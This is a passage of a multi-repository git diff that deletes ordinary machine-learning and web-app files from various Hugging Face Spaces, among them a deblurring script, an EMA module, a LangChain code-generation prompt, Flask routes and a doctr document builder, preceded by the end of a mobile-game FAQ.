A: You can change your name, avatar, or flag in War and Order APK by tapping on your profile button and choosing to edit your information. You can change your name once for free and then you need to pay gems for each change. You can change your avatar by selecting from the default options or uploading your own image. You can change your flag by selecting from the default options or creating your own design.

-

Q: How can I contact the customer service or report a problem in War and Order APK?

-

A: You can contact the customer service or report a problem in War and Order APK by tapping on the settings button and choosing to contact us or report a problem. You can also send an email to warandorder@camel4u.com or visit their official website or Facebook page for more information and support.

References:
- https://war-and-order.en.softonic.com/android
- https://apkcombo.com/war-and-order/com.camelgames.superking/
- https://www.warandorder.net/
- https://www.facebook.com/WarandOrder1/

-
-
\ No newline at end of file diff --git a/spaces/44ov41za8i/FreeVC/speaker_encoder/data_objects/speaker_batch.py b/spaces/44ov41za8i/FreeVC/speaker_encoder/data_objects/speaker_batch.py deleted file mode 100644 index 4485605e3ece5b491d1e7d0f223c543b6c91eb96..0000000000000000000000000000000000000000 --- a/spaces/44ov41za8i/FreeVC/speaker_encoder/data_objects/speaker_batch.py +++ /dev/null @@ -1,12 +0,0 @@ -import numpy as np -from typing import List -from speaker_encoder.data_objects.speaker import Speaker - -class SpeakerBatch: - def __init__(self, speakers: List[Speaker], utterances_per_speaker: int, n_frames: int): - self.speakers = speakers - self.partials = {s: s.random_partial(utterances_per_speaker, n_frames) for s in speakers} - - # Array of shape (n_speakers * n_utterances, n_frames, mel_n), e.g. for 3 speakers with - # 4 utterances each of 160 frames of 40 mel coefficients: (12, 160, 40) - self.data = np.array([frames for s in speakers for _, frames, _ in self.partials[s]]) diff --git a/spaces/52Hz/CMFNet_deblurring/main_test_CMFNet.py b/spaces/52Hz/CMFNet_deblurring/main_test_CMFNet.py deleted file mode 100644 index 4eb8ef0e52c306edbe58142fcf6f64bb93f615c5..0000000000000000000000000000000000000000 --- a/spaces/52Hz/CMFNet_deblurring/main_test_CMFNet.py +++ /dev/null @@ -1,88 +0,0 @@ -import argparse -import cv2 -import glob -import numpy as np -from collections import OrderedDict -from skimage import img_as_ubyte -import os -import torch -import requests -from PIL import Image -import torchvision.transforms.functional as TF -import torch.nn.functional as F -from natsort import natsorted -from model.CMFNet import CMFNet - -def main(): - parser = argparse.ArgumentParser(description='Demo Image Deblur') - parser.add_argument('--input_dir', default='test/', type=str, help='Input images') - parser.add_argument('--result_dir', default='results/', type=str, help='Directory for results') - parser.add_argument('--weights', - 
default='experiments/pretrained_models/deblur_GoPro_CMFNet.pth', type=str, - help='Path to weights') - - args = parser.parse_args() - - inp_dir = args.input_dir - out_dir = args.result_dir - - os.makedirs(out_dir, exist_ok=True) - - files = natsorted(glob.glob(os.path.join(inp_dir, '*'))) - - if len(files) == 0: - raise Exception(f"No files found at {inp_dir}") - - device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') - - # Load corresponding models architecture and weights - model = CMFNet() - model = model.to(device) - model.eval() - load_checkpoint(model, args.weights) - - - mul = 8 - for file_ in files: - img = Image.open(file_).convert('RGB') - input_ = TF.to_tensor(img).unsqueeze(0).to(device) - - # Pad the input if not_multiple_of 8 - h, w = input_.shape[2], input_.shape[3] - H, W = ((h + mul) // mul) * mul, ((w + mul) // mul) * mul - padh = H - h if h % mul != 0 else 0 - padw = W - w if w % mul != 0 else 0 - input_ = F.pad(input_, (0, padw, 0, padh), 'reflect') - - with torch.no_grad(): - restored = model(input_) - - restored = torch.clamp(restored, 0, 1) - restored = restored[:, :, :h, :w] - restored = restored.permute(0, 2, 3, 1).cpu().detach().numpy() - restored = img_as_ubyte(restored[0]) - - f = os.path.splitext(os.path.split(file_)[-1])[0] - save_img((os.path.join(out_dir, f + '.png')), restored) - - - -def save_img(filepath, img): - cv2.imwrite(filepath, cv2.cvtColor(img, cv2.COLOR_RGB2BGR)) - - -def load_checkpoint(model, weights): - checkpoint = torch.load(weights, map_location=torch.device('cpu')) - try: - model.load_state_dict(checkpoint["state_dict"]) - except: - state_dict = checkpoint["state_dict"] - new_state_dict = OrderedDict() - for k, v in state_dict.items(): - name = k[7:] # remove `module.` - new_state_dict[name] = v - model.load_state_dict(new_state_dict) - - -if __name__ == '__main__': - main() \ No newline at end of file diff --git a/spaces/AB-TW/team-ai/agents/tools/smart_domain/entity.py 
b/spaces/AB-TW/team-ai/agents/tools/smart_domain/entity.py deleted file mode 100644 index 6af9e009781e46eeb305ddf002773d1cbaa22024..0000000000000000000000000000000000000000 --- a/spaces/AB-TW/team-ai/agents/tools/smart_domain/entity.py +++ /dev/null @@ -1,115 +0,0 @@ -from langchain.prompts import PromptTemplate -from langchain.chains import LLMChain -from langchain.agents import tool -from agents.tools.smart_domain.common import getPrefix -from models import llm - -entity_architecture = """ -Entity: This component is use to represents business concepts and encapsulates business rules. -It may include 3 parts: -- id(identity of entity) -- description (properties package of entity represent the value of entity), -- associations (collection of associated entiy) ----example code: - @Getter - @AllArgsConstructor - public class Feature {{ - // id - private FeatureId id; - - // description - private FeatureDescription description; - - // associations - private FeatureConfigs configs; - - public record FeatureId(String featureKey) {{ - - }} - - @Builder - public record FeatureDescription(String name, - String description, - Boolean isEnable, - LocalDateTime updatedAt, - LocalDateTime createdAt))) {{ - - }} - - public Feature update(Feature newFeature) {{ - this.description = FeatureDescription.builder() - .name(newFeature.description.name()) - .description(newFeature.description.description()) - .isEnable(this.description.isEnable()) - .updatedAt(LocalDateTime.now()) - .createdAt(this.description.createdAt()); - - return this; - }} - - public interface FeatureConfigs() {{ - Flux findAll(); - Flux subCollection(long from, long to); - Mono findById(FeatureConfigId id); - }} - }} ----end of example code -""" - -entity_test_strategy = """ -For the Entity, we can write unit test to ensure that the business rules related to Merchandise are correctly encapsulated. 
----example code - class FeatureTest {{ - @Test - void should_update_feature_description() {{ - // given - Feature feature = Feature.builder() - .id(new FeatureId("featureKey")) - .description(new FeatureDescription("name", "description", true, LocalDateTime.now(), LocalDateTime.now())) - .build(); - Feature newFeature = Feature.builder() - .id(new FeatureId("featureKey")) - .description(new FeatureDescription("newName", "newDescription", true, LocalDateTime.now(), LocalDateTime.now())) - .build(); - // when - feature.update(newFeature); - // then - assertThat(feature.description().name()).isEqualTo("newName"); - assertThat(feature.description().description()).isEqualTo("newDescription"); - }} - }} ----end of example code -""" - -entity_tech_stack = """ -Java17、reactor、lombok、Junit5、reactor test、Mockito -""" - -entity_task = """Your task is to generate the Enity of domain layer tests and product code.""" -ENTITY = getPrefix(entity_task, entity_tech_stack, entity_architecture, entity_test_strategy) + """ - -Use the following format: -request: the request that you need to fulfill - -Entity: -``` -the Entity code that you write to fulfill the request, follow TechStack and Architecture -``` - -Test: -``` -the test code that you write to fulfill the request, follow TechStack Architecture and TestStrategy -``` - -request: {input}""" - -ENTITY_PROMPT = PromptTemplate(input_variables=["input"], template=ENTITY,) - -entityChain = LLMChain(llm = llm(temperature=0.1), prompt=ENTITY_PROMPT) - - -@tool("Generate Entity Code", return_direct=True) -def entityCodeGenerator(input: str) -> str: - '''useful for when you need to generate entity code''' - response = entityChain.run(input) - return response \ No newline at end of file diff --git a/spaces/ADOPLE/AdopleAI-Website-DocumentQA/README.md b/spaces/ADOPLE/AdopleAI-Website-DocumentQA/README.md deleted file mode 100644 index 46f027e1c546f424409ae59c1488a9576de99146..0000000000000000000000000000000000000000 --- 
a/spaces/ADOPLE/AdopleAI-Website-DocumentQA/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: DocumentQA Website -emoji: 🏃 -colorFrom: red -colorTo: red -sdk: gradio -sdk_version: 3.35.2 -app_file: app.py -pinned: false -duplicated_from: ADOPLE/Adopleai-DocumentQA ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/AIFILMS/generate_human_motion/VQ-Trans/options/option_vq.py b/spaces/AIFILMS/generate_human_motion/VQ-Trans/options/option_vq.py deleted file mode 100644 index 08a53ff1270facc10ab44ec0647e673ed1336d0d..0000000000000000000000000000000000000000 --- a/spaces/AIFILMS/generate_human_motion/VQ-Trans/options/option_vq.py +++ /dev/null @@ -1,61 +0,0 @@ -import argparse - -def get_args_parser(): - parser = argparse.ArgumentParser(description='Optimal Transport AutoEncoder training for AIST', - add_help=True, - formatter_class=argparse.ArgumentDefaultsHelpFormatter) - - ## dataloader - parser.add_argument('--dataname', type=str, default='kit', help='dataset directory') - parser.add_argument('--batch-size', default=128, type=int, help='batch size') - parser.add_argument('--window-size', type=int, default=64, help='training motion length') - - ## optimization - parser.add_argument('--total-iter', default=200000, type=int, help='number of total iterations to run') - parser.add_argument('--warm-up-iter', default=1000, type=int, help='number of total iterations for warmup') - parser.add_argument('--lr', default=2e-4, type=float, help='max learning rate') - parser.add_argument('--lr-scheduler', default=[50000, 400000], nargs="+", type=int, help="learning rate schedule (iterations)") - parser.add_argument('--gamma', default=0.05, type=float, help="learning rate decay") - - parser.add_argument('--weight-decay', default=0.0, type=float, help='weight decay') - parser.add_argument("--commit", type=float, default=0.02, help="hyper-parameter for the commitment loss") - 
parser.add_argument('--loss-vel', type=float, default=0.1, help='hyper-parameter for the velocity loss') - parser.add_argument('--recons-loss', type=str, default='l2', help='reconstruction loss') - - ## vqvae arch - parser.add_argument("--code-dim", type=int, default=512, help="embedding dimension") - parser.add_argument("--nb-code", type=int, default=512, help="nb of embedding") - parser.add_argument("--mu", type=float, default=0.99, help="exponential moving average to update the codebook") - parser.add_argument("--down-t", type=int, default=2, help="downsampling rate") - parser.add_argument("--stride-t", type=int, default=2, help="stride size") - parser.add_argument("--width", type=int, default=512, help="width of the network") - parser.add_argument("--depth", type=int, default=3, help="depth of the network") - parser.add_argument("--dilation-growth-rate", type=int, default=3, help="dilation growth rate") - parser.add_argument("--output-emb-width", type=int, default=512, help="output embedding width") - parser.add_argument('--vq-act', type=str, default='relu', choices = ['relu', 'silu', 'gelu'], help='dataset directory') - parser.add_argument('--vq-norm', type=str, default=None, help='dataset directory') - - ## quantizer - parser.add_argument("--quantizer", type=str, default='ema_reset', choices = ['ema', 'orig', 'ema_reset', 'reset'], help="eps for optimal transport") - parser.add_argument('--beta', type=float, default=1.0, help='commitment loss in standard VQ') - - ## resume - parser.add_argument("--resume-pth", type=str, default=None, help='resume pth for VQ') - parser.add_argument("--resume-gpt", type=str, default=None, help='resume pth for GPT') - - - ## output directory - parser.add_argument('--out-dir', type=str, default='output_vqfinal/', help='output directory') - parser.add_argument('--results-dir', type=str, default='visual_results/', help='output directory') - parser.add_argument('--visual-name', type=str, default='baseline', help='output directory') 
- parser.add_argument('--exp-name', type=str, default='exp_debug', help='name of the experiment, will create a file inside out-dir') - ## other - parser.add_argument('--print-iter', default=200, type=int, help='print frequency') - parser.add_argument('--eval-iter', default=1000, type=int, help='evaluation frequency') - parser.add_argument('--seed', default=123, type=int, help='seed for initializing training.') - - parser.add_argument('--vis-gt', action='store_true', help='whether visualize GT motions') - parser.add_argument('--nb-vis', default=20, type=int, help='nb of visualizations') - - - return parser.parse_args() \ No newline at end of file diff --git a/spaces/AIGC-Audio/Make_An_Audio/ldm/modules/ema.py b/spaces/AIGC-Audio/Make_An_Audio/ldm/modules/ema.py deleted file mode 100644 index c8c75af43565f6e140287644aaaefa97dd6e67c5..0000000000000000000000000000000000000000 --- a/spaces/AIGC-Audio/Make_An_Audio/ldm/modules/ema.py +++ /dev/null @@ -1,76 +0,0 @@ -import torch -from torch import nn - - -class LitEma(nn.Module): - def __init__(self, model, decay=0.9999, use_num_upates=True): - super().__init__() - if decay < 0.0 or decay > 1.0: - raise ValueError('Decay must be between 0 and 1') - - self.m_name2s_name = {} - self.register_buffer('decay', torch.tensor(decay, dtype=torch.float32)) - self.register_buffer('num_updates', torch.tensor(0,dtype=torch.int) if use_num_upates - else torch.tensor(-1,dtype=torch.int)) - - for name, p in model.named_parameters(): - if p.requires_grad: - #remove as '.'-character is not allowed in buffers - s_name = name.replace('.','') - self.m_name2s_name.update({name:s_name}) - self.register_buffer(s_name,p.clone().detach().data) - - self.collected_params = [] - - def forward(self,model): - decay = self.decay - - if self.num_updates >= 0: - self.num_updates += 1 - decay = min(self.decay,(1 + self.num_updates) / (10 + self.num_updates)) - - one_minus_decay = 1.0 - decay - - with torch.no_grad(): - m_param = 
dict(model.named_parameters()) - shadow_params = dict(self.named_buffers()) - - for key in m_param: - if m_param[key].requires_grad: - sname = self.m_name2s_name[key] - shadow_params[sname] = shadow_params[sname].type_as(m_param[key]) - shadow_params[sname].sub_(one_minus_decay * (shadow_params[sname] - m_param[key])) - else: - assert not key in self.m_name2s_name - - def copy_to(self, model): - m_param = dict(model.named_parameters()) - shadow_params = dict(self.named_buffers()) - for key in m_param: - if m_param[key].requires_grad: - m_param[key].data.copy_(shadow_params[self.m_name2s_name[key]].data) - else: - assert not key in self.m_name2s_name - - def store(self, parameters): - """ - Save the current parameters for restoring later. - Args: - parameters: Iterable of `torch.nn.Parameter`; the parameters to be - temporarily stored. - """ - self.collected_params = [param.clone() for param in parameters] - - def restore(self, parameters): - """ - Restore the parameters stored with the `store` method. - Useful to validate the model with EMA parameters without affecting the - original optimization process. Store the parameters before the - `copy_to` method. After validation (or model saving), use this to - restore the former parameters. - Args: - parameters: Iterable of `torch.nn.Parameter`; the parameters to be - updated with the stored parameters. 
- """ - for c_param, param in zip(self.collected_params, parameters): - param.data.copy_(c_param.data) diff --git a/spaces/ASJMO/freegpt/server/website.py b/spaces/ASJMO/freegpt/server/website.py deleted file mode 100644 index 01b35dee1621b5b5bea49de330466ebb62817f20..0000000000000000000000000000000000000000 --- a/spaces/ASJMO/freegpt/server/website.py +++ /dev/null @@ -1,58 +0,0 @@ -from flask import render_template, redirect, url_for, request, session -from flask_babel import refresh -from time import time -from os import urandom -from server.babel import get_locale, get_languages - - -class Website: - def __init__(self, bp, url_prefix) -> None: - self.bp = bp - self.url_prefix = url_prefix - self.routes = { - '/': { - 'function': lambda: redirect(url_for('._index')), - 'methods': ['GET', 'POST'] - }, - '/chat/': { - 'function': self._index, - 'methods': ['GET', 'POST'] - }, - '/chat/<conversation_id>': { - 'function': self._chat, - 'methods': ['GET', 'POST'] - }, - '/change-language': { - 'function': self.change_language, - 'methods': ['POST'] - }, - '/get-locale': { - 'function': self.get_locale, - 'methods': ['GET'] - }, - '/get-languages': { - 'function': self.get_languages, - 'methods': ['GET'] - } - } - - def _chat(self, conversation_id): - if '-' not in conversation_id: - return redirect(url_for('._index')) - - return render_template('index.html', chat_id=conversation_id, url_prefix=self.url_prefix) - - def _index(self): - return render_template('index.html', chat_id=f'{urandom(4).hex()}-{urandom(2).hex()}-{urandom(2).hex()}-{urandom(2).hex()}-{hex(int(time() * 1000))[2:]}', url_prefix=self.url_prefix) - - def change_language(self): - data = request.get_json() - session['language'] = data.get('language') - refresh() - return '', 204 - - def get_locale(self): - return get_locale() - - def get_languages(self): - return get_languages() diff --git a/spaces/AlexN/pull_up/README.md b/spaces/AlexN/pull_up/README.md deleted file mode 100644 index 
fd416cf9448817841aedd43602ead2c9fb679afc..0000000000000000000000000000000000000000 --- a/spaces/AlexN/pull_up/README.md +++ /dev/null @@ -1,37 +0,0 @@ ---- -title: Pull_up -emoji: 💪 -colorFrom: pink -colorTo: yellow -sdk: gradio -app_file: app.py -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/AlhitawiMohammed22/HTD_HTR/builder.py b/spaces/AlhitawiMohammed22/HTD_HTR/builder.py deleted file mode 100644 index e4bebf35c90979c17c95eb1cfcebee9a75b63174..0000000000000000000000000000000000000000 --- a/spaces/AlhitawiMohammed22/HTD_HTR/builder.py +++ /dev/null @@ -1,305 +0,0 @@ - -# Copyright (C) 2021, Mindee. - -# This program is licensed under the Apache License version 2. -# See LICENSE or go to for full license details. 
- - -from typing import Any, Dict, List, Tuple -import pandas as pd - -import numpy as np -from scipy.cluster.hierarchy import fclusterdata - -from doctr.utils.geometry import estimate_page_angle, resolve_enclosing_bbox, resolve_enclosing_rbbox, rotate_boxes -from doctr.utils.repr import NestedObject - -__all__ = ['DocumentBuilder'] - - -class DocumentBuilder(NestedObject): - """Implements a document builder - Args: - resolve_lines: whether words should be automatically grouped into lines - resolve_blocks: whether lines should be automatically grouped into blocks - paragraph_break: relative length of the minimum space separating paragraphs - export_as_straight_boxes: if True, force straight boxes in the export (fit a rectangle - box to all rotated boxes). Else, keep the boxes format unchanged, no matter what it is. - """ - - def __init__( - self, - resolve_lines: bool = True, - resolve_blocks: bool = True, - paragraph_break: float = 0.035, - export_as_straight_boxes: bool = False, - ) -> None: - - self.resolve_lines = resolve_lines - self.resolve_blocks = resolve_blocks - self.paragraph_break = paragraph_break - self.export_as_straight_boxes = export_as_straight_boxes - - @staticmethod - def _sort_boxes(boxes: np.ndarray) -> np.ndarray: - """Sort bounding boxes from top to bottom, left to right - Args: - boxes: bounding boxes of shape (N, 4) or (N, 4, 2) (in case of rotated bbox) - Returns: - tuple: indices of ordered boxes of shape (N,), boxes - If straight boxes are passed to the function, the boxes are unchanged; - otherwise, the returned boxes are straight boxes fitted to the straightened rotated boxes, - so that the lines can afterwards be fitted to the straightened page - """ - if boxes.ndim == 3: - boxes = rotate_boxes( - loc_preds=boxes, - angle=-estimate_page_angle(boxes), - orig_shape=(1024, 1024), - min_angle=5., - ) - boxes = np.concatenate((boxes.min(1), boxes.max(1)), -1) - return (boxes[:, 0] + 2 * boxes[:, 3] / np.median(boxes[:, 3] - boxes[:, 1])).argsort(), boxes - - 
def _resolve_sub_lines(self, boxes: np.ndarray, word_idcs: List[int]) -> List[List[int]]: - """Split a line in sub_lines - Args: - boxes: bounding boxes of shape (N, 4) - word_idcs: list of indexes for the words of the line - Returns: - A list of (sub-)lines computed from the original line (words) - """ - lines = [] - # Sort words horizontally - word_idcs = [word_idcs[idx] - for idx in boxes[word_idcs, 0].argsort().tolist()] - - # Eventually split line horizontally - if len(word_idcs) < 2: - lines.append(word_idcs) - else: - sub_line = [word_idcs[0]] - for i in word_idcs[1:]: - horiz_break = True - - prev_box = boxes[sub_line[-1]] - # Compute distance between boxes - dist = boxes[i, 0] - prev_box[2] - # If distance between boxes is lower than paragraph break, same sub-line - if dist < self.paragraph_break: - horiz_break = False - - if horiz_break: - lines.append(sub_line) - sub_line = [] - - sub_line.append(i) - lines.append(sub_line) - - return lines - - def _resolve_lines(self, boxes: np.ndarray) -> List[List[int]]: - """Order boxes to group them in lines - Args: - boxes: bounding boxes of shape (N, 4) or (N, 4, 2) in case of rotated bbox - Returns: - nested list of box indices - """ - - # Sort boxes, and straighten the boxes if they are rotated - idxs, boxes = self._sort_boxes(boxes) - - # Compute median for boxes heights - y_med = np.median(boxes[:, 3] - boxes[:, 1]) - - lines = [] - words = [idxs[0]] # Assign the top-left word to the first line - # Define a mean y-center for the line - y_center_sum = boxes[idxs[0]][[1, 3]].mean() - - for idx in idxs[1:]: - vert_break = True - - # Compute y_dist - y_dist = abs(boxes[idx][[1, 3]].mean() - y_center_sum / len(words)) - # If y-center of the box is close enough to mean y-center of the line, same line - if y_dist < y_med / 2: - vert_break = False - - if vert_break: - # Compute sub-lines (horizontal split) - lines.extend(self._resolve_sub_lines(boxes, words)) - words = [] - y_center_sum = 0 - - words.append(idx) - 
y_center_sum += boxes[idx][[1, 3]].mean() - - # Use the remaining words to form the last line(s) - if len(words) > 0: - # Compute sub-lines (horizontal split) - lines.extend(self._resolve_sub_lines(boxes, words)) - - return lines - - @staticmethod - def _resolve_blocks(boxes: np.ndarray, lines: List[List[int]]) -> List[List[List[int]]]: - """Order lines to group them in blocks - Args: - boxes: bounding boxes of shape (N, 4) or (N, 4, 2) - lines: list of lines, each line is a list of indices - Returns: - nested list of box indices - """ - # Resolve enclosing boxes of lines - if boxes.ndim == 3: - box_lines = np.asarray([ - resolve_enclosing_rbbox( - [tuple(boxes[idx, :, :]) for idx in line]) - for line in lines # type: ignore[misc] - ]) - else: - _box_lines = [ - resolve_enclosing_bbox([ - # type: ignore[misc] - (tuple(boxes[idx, :2]), tuple(boxes[idx, 2:])) for idx in line - ]) - for line in lines - ] - box_lines = np.asarray([(x1, y1, x2, y2) - for ((x1, y1), (x2, y2)) in _box_lines]) - - # Compute geometrical features of lines to cluster them - # Clustering only on box centers yields poor results for complex documents - if boxes.ndim == 3: - box_features = np.stack( - ( - (box_lines[:, 0, 0] + box_lines[:, 0, 1]) / 2, - (box_lines[:, 0, 0] + box_lines[:, 2, 0]) / 2, - (box_lines[:, 0, 0] + box_lines[:, 2, 1]) / 2, - (box_lines[:, 0, 1] + box_lines[:, 2, 1]) / 2, - (box_lines[:, 0, 1] + box_lines[:, 2, 0]) / 2, - (box_lines[:, 2, 0] + box_lines[:, 2, 1]) / 2, - ), axis=-1 - ) - else: - box_features = np.stack( - ( - (box_lines[:, 0] + box_lines[:, 3]) / 2, - (box_lines[:, 1] + box_lines[:, 2]) / 2, - (box_lines[:, 0] + box_lines[:, 2]) / 2, - (box_lines[:, 1] + box_lines[:, 3]) / 2, - box_lines[:, 0], - box_lines[:, 1], - ), axis=-1 - ) - # Compute clusters - clusters = fclusterdata( - box_features, t=0.1, depth=4, criterion='distance', metric='euclidean') - - _blocks: Dict[int, List[int]] = {} - # Form clusters - for line_idx, cluster_idx in 
enumerate(clusters): - if cluster_idx in _blocks.keys(): - _blocks[cluster_idx].append(line_idx) - else: - _blocks[cluster_idx] = [line_idx] - - # Retrieve word-box level to return a fully nested structure - blocks = [[lines[idx] for idx in block] for block in _blocks.values()] - - return blocks - - def _build_blocks(self, boxes: np.ndarray, word_preds: List[Tuple[str, float]], page_shapes: List[Tuple[int, int]]) -> Any: - """Gather independent words in structured blocks - Args: - boxes: bounding boxes of all detected words of the page, of shape (N, 5) or (N, 4, 2) - word_preds: list of all detected words of the page, of shape N - Returns: - list of block elements - """ - - if boxes.shape[0] != len(word_preds): - raise ValueError( - f"Incompatible argument lengths: {boxes.shape[0]}, {len(word_preds)}") - - if boxes.shape[0] == 0: - return [] - - # Decide whether we try to form lines - _boxes = boxes - if self.resolve_lines: - lines = self._resolve_lines( - _boxes if _boxes.ndim == 3 else _boxes[:, :4]) - # Decide whether we try to form blocks - if self.resolve_blocks and len(lines) > 1: - _blocks = self._resolve_blocks( - _boxes if _boxes.ndim == 3 else _boxes[:, :4], lines) - else: - _blocks = [lines] - else: - # Sort bounding boxes, one line for all boxes, one block for the line - lines = [self._sort_boxes( - _boxes if _boxes.ndim == 3 else _boxes[:, :4])[0]] - _blocks = [lines] - - rows = [] - for block_idx, lines in enumerate(_blocks): - for line_idx, line in enumerate(lines): - for i,idx in enumerate(line): - h, w = page_shapes - row = ( - block_idx, line_idx, i, word_preds[idx], - int(round(boxes[idx, 0]*w) - ), int(round(boxes[idx, 1]*h)), - int(round(boxes[idx, 2]*w) - ), int(round(boxes[idx, 3]*h)), - int(round(boxes[idx, 4]*100)) - ) - rows.append(row) - - return rows - - def extra_repr(self) -> str: - return (f"resolve_lines={self.resolve_lines}, resolve_blocks={self.resolve_blocks}, " - f"paragraph_break={self.paragraph_break}, " - 
f"export_as_straight_boxes={self.export_as_straight_boxes}") - - def __call__( - self, - boxes: List[np.ndarray], - text_preds: List[List[Tuple[str, float]]], - page_shapes: List[Tuple[int, int]] - ) -> pd.DataFrame: - """Re-arrange detected words into structured blocks - Args: - boxes: list of N elements, where each element represents the localization predictions, of shape (*, 5) - or (*, 6) for all words for a given page - text_preds: list of N elements, where each element is the list of all word prediction (text + confidence) - page_shape: shape of each page, of size N - Returns: - document object - """ - if len(boxes) != len(text_preds) or len(boxes) != len(page_shapes): - raise ValueError( - "All arguments are expected to be lists of the same size") - - if self.export_as_straight_boxes and len(boxes) > 0: - # If boxes are already straight OK, else fit a bounding rect - if boxes[0].ndim == 3: - straight_boxes = [] - # Iterate over pages - for p_boxes in boxes: - # Iterate over boxes of the pages - straight_boxes.append(np.concatenate( - (p_boxes.min(1), p_boxes.max(1)), 1)) - boxes = straight_boxes - - _pages = [ - pd.DataFrame.from_records(self._build_blocks(page_boxes, word_preds, shape), columns=[ - "block_num", "line_num", "word_num" ,"word", "xmin", "ymin", "xmax", "ymax", "confidence_score" - ]) - for _idx, shape, page_boxes, word_preds in zip(range(len(boxes)), page_shapes, boxes, text_preds) - ] - - return _pages \ No newline at end of file diff --git a/spaces/Alpaca233/SadTalker/src/face3d/data/flist_dataset.py b/spaces/Alpaca233/SadTalker/src/face3d/data/flist_dataset.py deleted file mode 100644 index c0b6945c80aa756074a5d3c02b9443b15ddcfc57..0000000000000000000000000000000000000000 --- a/spaces/Alpaca233/SadTalker/src/face3d/data/flist_dataset.py +++ /dev/null @@ -1,125 +0,0 @@ -"""This script defines the custom dataset for Deep3DFaceRecon_pytorch -""" - -import os.path -from data.base_dataset import BaseDataset, get_transform, get_affine_mat, 
apply_img_affine, apply_lm_affine -from data.image_folder import make_dataset -from PIL import Image -import random -import util.util as util -import numpy as np -import json -import torch -from scipy.io import loadmat, savemat -import pickle -from util.preprocess import align_img, estimate_norm -from util.load_mats import load_lm3d - - -def default_flist_reader(flist): - """ - flist format: impath label\nimpath label\n ...(same to caffe's filelist) - """ - imlist = [] - with open(flist, 'r') as rf: - for line in rf.readlines(): - impath = line.strip() - imlist.append(impath) - - return imlist - -def jason_flist_reader(flist): - with open(flist, 'r') as fp: - info = json.load(fp) - return info - -def parse_label(label): - return torch.tensor(np.array(label).astype(np.float32)) - - -class FlistDataset(BaseDataset): - """ - It requires one directories to host training images '/path/to/data/train' - You can train the model with the dataset flag '--dataroot /path/to/data'. - """ - - def __init__(self, opt): - """Initialize this dataset class. - - Parameters: - opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions - """ - BaseDataset.__init__(self, opt) - - self.lm3d_std = load_lm3d(opt.bfm_folder) - - msk_names = default_flist_reader(opt.flist) - self.msk_paths = [os.path.join(opt.data_root, i) for i in msk_names] - - self.size = len(self.msk_paths) - self.opt = opt - - self.name = 'train' if opt.isTrain else 'val' - if '_' in opt.flist: - self.name += '_' + opt.flist.split(os.sep)[-1].split('_')[0] - - - def __getitem__(self, index): - """Return a data point and its metadata information. 
- - Parameters: - index (int) -- a random integer for data indexing - - Returns a dictionary that contains the image, mask, landmarks and metadata: - img (tensor) -- an image in the input domain - msk (tensor) -- its corresponding attention mask - lm (tensor) -- its corresponding 3d landmarks - im_paths (str) -- image paths - aug_flag (bool) -- a flag used to tell whether it is raw or augmented - """ - msk_path = self.msk_paths[index % self.size] # make sure index is within the range - img_path = msk_path.replace('mask/', '') - lm_path = '.'.join(msk_path.replace('mask', 'landmarks').split('.')[:-1]) + '.txt' - - raw_img = Image.open(img_path).convert('RGB') - raw_msk = Image.open(msk_path).convert('RGB') - raw_lm = np.loadtxt(lm_path).astype(np.float32) - - _, img, lm, msk = align_img(raw_img, raw_lm, self.lm3d_std, raw_msk) - - aug_flag = self.opt.use_aug and self.opt.isTrain - if aug_flag: - img, lm, msk = self._augmentation(img, lm, self.opt, msk) - - _, H = img.size - M = estimate_norm(lm, H) - transform = get_transform() - img_tensor = transform(img) - msk_tensor = transform(msk)[:1, ...] - lm_tensor = parse_label(lm) - M_tensor = parse_label(M) - - - return {'imgs': img_tensor, - 'lms': lm_tensor, - 'msks': msk_tensor, - 'M': M_tensor, - 'im_paths': img_path, - 'aug_flag': aug_flag, - 'dataset': self.name} - - def _augmentation(self, img, lm, opt, msk=None): - affine, affine_inv, flip = get_affine_mat(opt, img.size) - img = apply_img_affine(img, affine_inv) - lm = apply_lm_affine(lm, affine, flip, img.size) - if msk is not None: - msk = apply_img_affine(msk, affine_inv, method=Image.BILINEAR) - return img, lm, msk - - - - - def __len__(self): - """Return the total number of images in the dataset. 
- """ - return self.size diff --git a/spaces/Alycer/VITS-Umamusume-voice-synthesizer/monotonic_align/__init__.py b/spaces/Alycer/VITS-Umamusume-voice-synthesizer/monotonic_align/__init__.py deleted file mode 100644 index 3d7009c40fea3a98168e3e3bc9ae061e91327422..0000000000000000000000000000000000000000 --- a/spaces/Alycer/VITS-Umamusume-voice-synthesizer/monotonic_align/__init__.py +++ /dev/null @@ -1,19 +0,0 @@ -import numpy as np -import torch -from .monotonic_align.core import maximum_path_c - - -def maximum_path(neg_cent, mask): - """ Cython optimized version. - neg_cent: [b, t_t, t_s] - mask: [b, t_t, t_s] - """ - device = neg_cent.device - dtype = neg_cent.dtype - neg_cent = neg_cent.data.cpu().numpy().astype(np.float32) - path = np.zeros(neg_cent.shape, dtype=np.int32) - - t_t_max = mask.sum(1)[:, 0].data.cpu().numpy().astype(np.int32) - t_s_max = mask.sum(2)[:, 0].data.cpu().numpy().astype(np.int32) - maximum_path_c(path, neg_cent, t_t_max, t_s_max) - return torch.from_numpy(path).to(device=device, dtype=dtype) diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/pipelines/value_guided_sampling.md b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/pipelines/value_guided_sampling.md deleted file mode 100644 index 0509b196b57820e88bcff9c6821612df15313ebf..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/pipelines/value_guided_sampling.md +++ /dev/null @@ -1,32 +0,0 @@ - - -# Value-guided planning - - - 